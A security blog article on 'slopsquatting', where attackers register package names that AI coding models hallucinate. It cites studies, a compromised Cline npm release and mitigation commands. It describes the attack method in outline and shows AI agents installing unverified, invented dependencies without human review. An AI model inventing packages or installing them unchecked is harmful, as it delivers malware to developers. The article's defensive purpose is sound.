# Slopsquatting: Your AI Coding Agent Is Now a Supply Chain Risk

> Source: <https://byteiota.com/slopsquatting-ai-coding-agent-supply-chain-attack/>
> Published: 2026-07-04 14:09:22+00:00

On February 17, 2026, at 3:26 AM PT, roughly 4,000 developers updated their Cline AI coding tool and received something they never asked for: OpenClaw, silently installed on their machines via a postinstall script tucked inside a compromised npm package. The attackers had an eight-hour window. They used all of it. Welcome to slopsquatting — the supply chain attack your AI coding assistant is helping build.

## What Is Slopsquatting?

Slopsquatting is what happens when an AI model confidently recommends a package that does not exist, and an attacker has already registered that name with malicious code. It is the spiritual successor to typosquatting, except no one mistyped anything. The AI invented a plausible-sounding package name, and the developer — or their agent — ran `npm install`

.

The term was coined by Seth Larson, developer in residence at the Python Software Foundation. The “slop” in slopsquatting is intentional — it refers to the low-quality, confident-sounding AI output that creates the vulnerability in the first place. Unlike typosquatting, there is no telltale misspelling to catch. The hallucinated name looks legitimate because the model generated it to sound legitimate.

## The Numbers Are Worse Than You Think

A [May 2026 study](https://arxiv.org/abs/2605.17062) tested five widely used coding models — Claude Sonnet 4.6, Claude Haiku 4.5, GPT-5.4-mini, Gemini 2.5 Pro, and DeepSeek V3.2 — across nearly 200,000 prompts. The finding that should concern every developer: **127 package names are hallucinated identically by all five models**. Not similar names. The exact same names. 109 on PyPI, 18 on npm.

That is not a quirk of one assistant. That is pre-positioned attack infrastructure waiting for any of the five most popular coding tools to recommend it to a developer.

Earlier [Cloud Security Alliance research](https://labs.cloudsecurityalliance.org/research/csa-research-note-slopsquatting-ai-supply-chain-20260419-csa/) found that 43% of hallucinated package names appeared on every single repeated run of the same prompt. An attacker needs only to run a few dozen prompts, note which fake package names keep recurring, and register them. The math is straightforward. The return on investment is high.

## The Attack Is Already Live

This is not a theoretical concern. The `unused-imports`

package on npm is a textbook example: AI models consistently recommend it instead of the legitimate `eslint-plugin-unused-imports`

. An attacker registered the hallucinated name with a malicious payload. As of early 2026, it was still recording approximately 233 weekly downloads despite npm marking it security-held.

As of July 1, 2026, [attackers are confirmed to be actively exploiting this vector](https://www.techtimes.com/articles/319457/20260701/ai-coding-agents-skip-package-verification-attackers-are-exploiting-it.htm). Real malicious packages built on slopsquatting have accumulated tens of thousands of downloads across the ecosystem. The window between “theoretical research” and “active exploitation” closed faster than most teams noticed.

## AI Agents Make It Exponentially Worse

When a developer follows a bad AI recommendation, they can pause before hitting Enter. When an AI agent does it, there is no pause. Tools like Claude Code, GitHub Copilot, and Cursor increasingly manage dependencies autonomously — pulling packages, adding them to manifests, running installs — without a human checkpoint between recommendation and execution.

Both npm and pip run post-install scripts by default. That means a malicious payload executes the moment `npm install`

completes — before any code review, before any security scan, before anyone on the team knows a new package was added. The [Clinejection incident](https://snyk.io/blog/cline-supply-chain-attack-prompt-injection-github-actions/) illustrated this precisely: a compromised publish token, a postinstall script, and an eight-hour window were all it took to land unauthorized software on 4,000 developer machines. No one had to click anything. The agent handled it.

## What to Do Right Now

The mitigations are not complicated. None of them are on by default.

**For your pipelines:**

- Commit your lockfile (
`package-lock.json`

,`poetry.lock`

) to source control and run`npm ci`

instead of`npm install`

in CI/CD — this installs from the lockfile exactly with no room for surprise packages - Enable hash verification on all dependency installations
- Run new packages through a behavioral analysis tool like
[Socket.dev](https://socket.dev)or Snyk before installing

**For your AI agents:**

- Restrict agent permissions — do not grant unrestricted shell or exec access
- Implement an explicit package allowlist: any agent-recommended package not on the list requires human review before installation
- Use
`npm install --ignore-scripts`

to prevent post-install scripts from executing automatically

```
# Install from lockfile only — no deviations
npm ci

# Block post-install scripts from executing on install
npm install --ignore-scripts

# Scan before you install with Socket
npx socket npm install <package-name>
```

## The Actual Problem

AI coding tools are not the villain here. Hallucination rates dropped from nearly 20% in 2025 to roughly 5–6% across major models in 2026 — real progress. The problem is the assumption baked into most development workflows: that AI agent actions require zero human oversight. That assumption was wrong before slopsquatting existed. It is dangerous now that attackers have found the gap.

Treat AI-recommended packages the same way you would treat a dependency submitted in a pull request from someone you have never met. Because that is effectively what it is. Your agent is only as trustworthy as the permissions you give it and the gates you put in its path — and right now, most teams have given their agents everything and gated nothing.
